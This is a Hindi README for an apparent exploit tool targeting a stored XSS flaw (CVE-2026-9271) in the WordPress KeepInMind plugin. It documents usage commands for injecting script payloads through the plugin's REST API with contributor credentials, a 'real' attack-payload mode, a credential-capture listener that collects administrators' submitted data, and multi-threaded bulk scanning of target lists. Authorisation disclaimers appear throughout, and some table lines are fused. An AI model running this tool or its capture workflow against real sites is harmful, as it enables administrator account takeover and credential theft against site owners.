
अधिकृत stored XSS मूल्यांकन उपकरण WordPress KeepInMind प्लगइन में CVE-2026-9271 के लिए। कमजोर संस्करणों का पता लगाता है, सुरक्षित परीक्षण पेलोड इंजेक्ट करता है, और SQLite रिपोर्टिंग के साथ बल्क स्कैनिंग का समर्थन करता है।
CVE-2026-9271 के लिए अधिकृत सुरक्षा मूल्यांकन उपकरण
लेखक: सुदीपा वानिगरत्ना · उपकरण: KIM-Guardian Pro v1.0
मुख्य स्क्रिप्ट: CVE-2026-9271.py

[!महत्वपूर्ण] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा और उन प्रणालियों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत कंप्यूटर सिस्टम एक्सेस अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता।
CVE-2026-9271 वर्डप्रेस KeepInMind (डैशबोर्ड नोट्स) प्लगइन में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) समस्या है। नोट सामग्री के अपर्याप्त स्वच्छीकरण के कारण, एक निम्न-विशेषाधिकार प्राप्त प्रमाणित उपयोगकर्ता (योगदानकर्ता+) HTML/JS संग्रहीत कर सकता है जो प्रशासक के ब्राउज़र में निष्पादित होता है, जिससे प्रशासक सत्र से समझौता / खाता अधिग्रहण हो सकता है।
KIM-Guardian Pro (CVE-2026-9271.py) अधिकृत परीक्षकों के लिए एक Python मूल्यांकन उपकरण है:
reports/ के अंतर्गत SQLite और टेक्स्ट रिपोर्ट में परिणाम संग्रहीत करें| गुण | मान |
|---|---|
| CVE ID | CVE-2026-9271 |
| हमला वेक्टर | प्रमाणित (योगदानकर्ता+) → संग्रहीत XSS → प्रशासक पर प्रभाव |
| प्रभाव | प्रशासक ब्राउज़र XSS; संवेदनशील स्थापनाओं में संभावित खाता अधिग्रहण |
| प्रभावित उत्पाद | WordPress KeepInMind / KeepInMind Dashboard Notes |
| प्रभावित संस्करण | ≤ 0.8.4.2 (0.8.4.3+ में पैच किया गया) |
| भेद्यता प्रकार | संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) |
| CWE | CWE-79 (वेब पेज जनरेशन के दौरान इनपुट का अनुचित तटस्थीकरण) |
| सतह | भूमिका |
|---|---|
/wp-json/keepinmind/v1/notes | REST API नोट्स बनाने/पढ़ने के लिए उपयोग किया जाता है |
/wp-admin/ | प्रशासक डैशबोर्ड जहाँ संग्रहीत नोट्स रेंडर हो सकते हैं |
| प्लगइन पथ | /wp-content/plugins/keepinmind-dashboard-notes/ |
--no-cleanup का उपयोग न किया गया हो)| क्षमता | विवरण |
|---|---|
| प्लगइन पता लगाना | KeepInMind स्थापना पथ और संस्करण स्ट्रिंग्स की जाँच करता है |
| WordPress संस्करण | उपलब्ध होने पर जनरेटर / संस्करण मेटाडेटा निकालता है |
| सुरक्षित परीक्षण मोड | डिफ़ॉल्ट ओवरले मार्कर जो क्रेडेंशियल कैप्चर किए बिना XSS साबित करता है |
| प्रमाणित मूल्यांकन | पूर्ण REST इंजेक्शन के लिए योगदानकर्ता+ क्रेडेंशियल के साथ लॉग इन करता है |
| पेलोड सफाई | मूल्यांकन के बाद इंजेक्ट किए गए नोट्स को हटाता है |
| बल्क स्कैनिंग | प्लगइन + संवेदनशील संस्करण के लिए मल्टी-थ्रेडेड URL सूची स्कैन |
| SQLite इतिहास | kim_guardian.db में मूल्यांकन संग्रहीत करता है |
| टेक्स्ट रिपोर्ट | reports/ के अंतर्गत टाइमस्टैम्प्ड रिपोर्ट लिखता है |
| कैप्चर सर्वर | प्रयोगशाला क्रेडेंशियल-कैप्चर अभ्यासों के लिए वैकल्पिक स्थानीय HTTP लिसनर |
| वेब UI | वैकल्पिक Flask डैशबोर्ड (web मोड) |
| क्षमता | विवरण |
|---|---|
| विस्तृत लॉगिंग | logs/ के अंतर्गत फ़ाइल + कंसोल डीबग |
| प्रॉक्सी समर्थन | Burp या अन्य HTTP प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें |
| कॉन्फ़िगरेबल टाइमआउट | प्रति-अनुरोध टाइमआउट (डिफ़ॉल्ट 30s) |
| वर्कर पूल | बल्क स्कैन के लिए समायोज्य समवर्तीता |
pipcd /path/to/exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
# इस स्क्रिप्ट द्वारा उपयोग किए जाने वाले अनुशंसित एक्सट्रा:
pip install colorama beautifulsoup4 requests flask
python3 CVE-2026-9271.py --help
requests>=2.31.0
beautifulsoup4>=4.12.0
colorama>=0.4.6
flask>=3.0.0 # वैकल्पिक — केवल वेब मोड
https://lab.exampleको केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।
# सहायता / मोड
python3 CVE-2026-9271.py --help
# सुरक्षित एकल-लक्ष्य मूल्यांकन (डिफ़ॉल्ट: परीक्षण पेलोड)
python3 CVE-2026-9271.py assess https://lab.example \
-u contributor -p 'password' -v
# बल्क संस्करण / प्लगइन स्कैन
python3 CVE-2026-9271.py bulk -f targets.txt -w 8 -o bulk_results.txt
# SQLite से हाल के मूल्यांकन सूचीबद्ध करें
python3 CVE-2026-9271.py db --list --limit 20
# स्थानीय कैप्चर सर्वर (केवल प्रयोगशाला)
python3 CVE-2026-9271.py capture --port 5000
# वैकल्पिक वेब UI
python3 CVE-2026-9271.py web --host 127.0.0.1 --port 8080
python3 CVE-2026-9271.py --help
python3 CVE-2026-9271.py assess --help
डिफ़ॉल्ट मोड एक गैर-कैप्चरिंग परीक्षण ओवरले का उपयोग करता है। REST API के माध्यम से इंजेक्शन के लिए योगदानकर्ता+ क्रेडेंशियल प्रदान करें।
python3 CVE-2026-9271.py assess https://lab.example \
-u contributor \
-p 'password' \
-v
कार्यप्रवाह:
-u / -p दिया गया हो)--no-cleanup का उपयोग न किया गया हो)reports/kim_assessment_*.txt में सहेजेंpython3 CVE-2026-9271.py assess https://lab.example \
-u contributor -p 'password' --no-cleanup
python3 CVE-2026-9271.py assess https://lab.example \
-u contributor -p 'password' \
--proxy http://127.0.0.1:8080 \
--timeout 45 \
-v
एक हमलावर/कैप्चर आधार URL और --real की आवश्यकता है। प्रयोगशालाओं के लिए कैप्चर को localhost पर रखना पसंद करें।
# टर्मिनल 1 — कैप्चर लिसनर
python3 CVE-2026-9271.py capture --port 5000
# टर्मिनल 2 — कैप्चर एंडपॉइंट के साथ मूल्यांकन
python3 CVE-2026-9271.py assess https://lab.example \
-u contributor -p 'password' \
-a http://127.0.0.1:5000 \
--real \
-v
कैप्चर UI (जब सर्वर चल रहा हो):
| पथ | उद्देश्य |
|---|---|
/ | कैप्चर सर्वर स्थिति पृष्ठ |
/capture | फ़ॉर्म सबमिशन के लिए POST एंडपॉइंट |
/captured | हाल ही में कैप्चर की गई प्रविष्टियाँ (प्रयोगशाला समीक्षा) |
# targets.txt — प्रति पंक्ति एक URL
python3 CVE-2026-9271.py bulk -f targets.txt -w 5 -o bulk_scan_results.txt
# या अल्पविराम से अलग किए गए URL
python3 CVE-2026-9271.py bulk -u "https://a.example,https://b.example" -w 3
बल्क जाँच में आमतौर पर WordPress संकेत, KeepInMind संस्करण, REST पहुँच और wp-login.php उपस्थिति शामिल होती है।
python3 CVE-2026-9271.py db --list
python3 CVE-2026-9271.py db --list --limit 50
python3 CVE-2026-9271.py web --host 127.0.0.1 --port 8080
सुरक्षा के लिए डिफ़ॉल्ट रूप से localhost से बाइंड करें।
| मोड | विवरण |
|---|---|
assess | एकल-लक्ष्य KeepInMind मूल्यांकन |
bulk | बहु-लक्ष्य प्लगइन / संस्करण स्कैन |
capture | स्थानीय क्रेडेंशियल-कैप्चर HTTP सर्वर |
web | वैकल्पिक Flask वेब UI |
db | संग्रहीत मूल्यांकन सूचीबद्ध करें |
assess| तर्क | डिफ़ॉल्ट | विवरण |
|---|---|---|
url | आवश्यक | लक्ष्य WordPress URL |
-u, --username | — | WordPress उपयोगकर्ता नाम (योगदानकर्ता+) |
-p, --password | — | WordPress पासवर्ड |
-a, --attacker | — | कैप्चर सर्वर आधार URL (प्रयोगशाला सिमुलेशन) |
-t, --test | चालू | सुरक्षित परीक्षण पेलोड पसंद करें |
-r, --real | बंद | प्रयोगशाला हमला पेलोड सक्षम करें (--attacker की आवश्यकता है) |
--no-cleanup | बंद | इंजेक्ट किए गए नोट्स को रहने दें |
-v, --verbose | बंद | विस्तृत / डीबग लॉगिंग |
--timeout | 30 | अनुरोध टाइमआउट (सेकंड) |
--proxy | — | प्रॉक्सी URL (जैसे http://127.0.0.1:8080) |
bulk| तर्क | डिफ़ॉल्ट | विवरण |
|---|---|---|
-f, --file | — | URL की फ़ाइल (प्रति पंक्ति एक) |
-u, --urls | — | अल्पविराम से अलग किए गए URL |
-w, --workers | 5 | थ्रेड पूल आकार |
-o, --output | bulk_scan_results.txt | रिपोर्ट पथ |
capture| तर्क | डिफ़ॉल्ट | विवरण |
|---|---|---|
--port | 5000 | सुनने का पोर्ट |
web| तर्क | डिफ़ॉल्ट | विवरण |
|---|---|---|
--host | 127.0.0.1 | बाइंड पता |
--port | 8080 | सुनने का पोर्ट |
db| तर्क | डिफ़ॉल्ट | विवरण |
|---|---|---|
--list | बंद | हाल के मूल्यांकन सूचीबद्ध करें |
--limit | 10 | दिखाने के लिए अधिकतम पंक्तियाँ |
प्रमाणीकरण, प्लगइन पता लगाना, इंजेक्शन, सत्यापन और सफाई के लिए रंगीन स्थिति।
सफल assess रन इस प्रकार फ़ाइलें लिखते हैं:
reports/kim_assessment_YYYYMMDD_HHMMSS.txt
| फ़ाइल | उद्देश्य |
|---|---|
kim_guardian.db | मूल्यांकन इतिहास (लक्ष्य, संस्करण, भेद्यता ध्वज, जोखिम, अवधि) |
| पथ | उद्देश्य |
|---|---|
logs/kim_pro_*.log | प्रति-रन एप्लिकेशन लॉग |
| लक्षण | क्या प्रयास करें |
|---|---|
| प्रमाणीकरण विफल | योगदानकर्ता+ क्रेडेंशियल की पुष्टि करें; /wp-login.php जाँचें; -v का उपयोग करें |
| प्लगइन का पता नहीं चला | KeepInMind पथ/नाम सत्यापित करें; विस्तृत मोड आज़माएँ |
| REST इंजेक्शन विफल | प्रमाणीकरण + नॉन्स की पुष्टि करें; --proxy के माध्यम से Burp से निरीक्षण करें |
| टाइमआउट / कनेक्शन त्रुटियाँ | --timeout बढ़ाएँ; नेटवर्क / TLS / प्रॉक्सी जाँचें |
| परीक्षण मोड में कोई भेद्यता नहीं | संस्करण ≤ 0.8.4.2 की पुष्टि करें; सुनिश्चित करें कि नोट्स प्रशासक के लिए रेंडर होते हैं |
web मोड में Flask गुम | pip install flask |
| BeautifulSoup गुम | pip install beautifulsoup4 |
python3 CVE-2026-9271.py assess https://lab.example \
-u contributor -p 'password' \
--proxy http://127.0.0.1:8080 \
-v
exploit/
├── CVE-2026-9271.py # KIM-Guardian Pro (v1.0)
├── requirements.txt # Python निर्भरताएँ
├── README.md # यह फ़ाइल
├── kim_guardian.db # SQLite मूल्यांकन इतिहास (उत्पन्न)
├── logs/ # रनटाइम लॉग (उत्पन्न)
├── reports/ # मूल्यांकन टेक्स्ट रिपोर्ट (उत्पन्न)
└── venv/ # स्थानीय वर्चुअलएनव (वैकल्पिक)
यह परियोजना जैसी है वैसी रक्षात्मक सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए प्रदान की गई है।
इस सॉफ़्टवेयर का उपयोग करके आप सहमत होते हैं कि:
यदि आपको यह समस्या उन उत्पादन प्रणालियों में मिलती है जिनके आप स्वामी नहीं हैं, तो साइट स्वामी और प्लगइन रखरखावकर्ता के साथ जिम्मेदार प्रकटीकरण का पालन करें।
अनधिकृत कंप्यूटर सिस्टम एक्सेस अवैध है।
| भूमिका | नाम |
|---|---|
| उपकरण लेखक | सुदीपा वानिगरत्ना |
| CVE | CVE-2026-9271 |
| उपकरण | KIM-Guardian Pro v1.0 |
| मुख्य स्क्रिप्ट | CVE-2026-9271.py |
| लाइसेंस | शैक्षिक / रक्षात्मक उपयोग |
केवल शैक्षिक / रक्षात्मक उपयोग
कॉपीराइट (c) 2026 सुदीपा वानिगरत्ना
इस सॉफ़्टवेयर का उपयोग केवल अधिकृत सुरक्षा अनुसंधान,
शिक्षा और रक्षात्मक मूल्यांकन के लिए करने की अनुमति दी गई है।
सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की
वारंटी के, स्पष्ट या निहित, जिसमें व्यापारिकता,
किसी विशेष उद्देश्य के लिए उपयुक्तता और उल्लंघन की वारंटी शामिल नहीं है।
केवल अधिकृत सुरक्षा परीक्षण के लिए।